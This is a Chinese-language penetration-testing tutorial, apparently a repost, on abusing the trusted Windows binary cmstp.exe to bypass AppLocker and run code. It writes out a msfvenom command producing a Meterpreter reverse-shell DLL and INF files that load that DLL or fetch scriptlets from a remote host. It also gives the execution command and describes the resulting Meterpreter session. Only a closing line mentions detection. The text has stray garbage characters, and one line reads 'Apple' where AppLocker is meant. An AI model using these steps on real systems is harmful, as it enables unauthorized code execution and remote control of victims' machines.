CMSTP中怎么繞過AppLocker
這期內容當中小編將會給大家帶來有關CMSTP中怎么繞過AppLocker�,文章內容豐富且以專業的角度為大家分析和敘述����,閱讀完這篇文章希望大家可以有所收獲��。
CMSTP是一個與Microsoft連接管理器配置文件安裝程序關聯的二進制文件��。它接受INF文件���,這些文件可以通過惡意命令武器化�����,以腳本(SCT)和DLL的形式執行任意代碼�����。它是一個受信任的Microsoft二進制文件���,位于以下兩個Windows目錄中�����。
C:\Windows\System32\cmstp.exe
C:\Windows\SysWOW64\cmstp.exe
AppLocker默認規則允許在這些文件夾中執行二進制文件�,因此我們可以用它來作為bypass的一種方法��。該方法最初是由Oddvar Moe發現的����,使用這個二進制文件可以繞過AppLocker和UAC���,具體可以參閱他的博文��。
DLL
通過Metasploit Framework的msfvenom生成惡意DLL文件���。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 LPORT=4444 -f dll > /root/Desktop/pentestlab.dll
INF文件的RegisterOCXSection需要包含惡意DLL文件的本地路徑或遠程執行的WebDAV位置���。
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
RegisterOCXs=RegisterOCXSection
[RegisterOCXSection]
C:\Users\test.PENTESTLAB\pentestlab.dll
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
Metasploit multi/handler模塊需要配置為接收連接�����。
當惡意INF文件與cmstp一起提供時�����,代碼將會在后臺執行���。
cmstp.exe /s cmstp.inf
Meterpreter會話將從DLL執行中打開�。
SCT
除了DLL文件外�����,cmstp還能夠運行SCT文件����,這在紅隊操作中擴展了二進制的可用性�。 Nick Tyrer最初通過Twitter展示了這種能力�。
Nick Tyrer還編寫了一個名為powersct.sct的scriptlet���,可以將其用作執行PowerShell命令的備選解決方案���,以應對本機PowerShell被阻止的情況��。UnRegisterOCXSection需要包含scriptlet的URL���。最終的INF文件需要包含以下內容:
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/powersct.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
當INF文件被執行一個新的窗口將打開�����,這將允許用戶執行PowerShell命令��。
cmstp.exe /s cmstp.inf
代碼執行也可以通過使用scriptlet來調用惡意可執行文件�����。INF文件需要包含scriptlet的遠程位置�����。
[version]
Signature=$chicago$
AdvancedINF=2.5
[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection
[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://10.0.0.2/tmp/pentestlab.sct
[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Pentestlab"
ShortSvcName="Pentestlab"
在執行INF文件時����,將會打開一個新的命令提示符窗口�,這表示代碼已被成功執行����。
成功獲取到一個Meterpreter會話��。
總結
使用CMSTP二進制來繞過Apple限制和代碼執行��。CMSTP需要INF文件并在執行時生成一個CMP文件�,它是連接管理器設置文件��。因此����,如果惡意攻擊者已經開始使用此技術����,且CMSTP.EXE二進制無法被AppLocker規則阻止的情況下����,則需要將這兩個文件作為IoC進行監視���。
上述就是小編為大家分享的CMSTP中怎么繞過AppLocker了�,如果剛好有類似的疑惑�,不妨參照上述分析進行理解��。如果想知道更多相關知識���,歡迎關注億速云行業資訊頻道�。
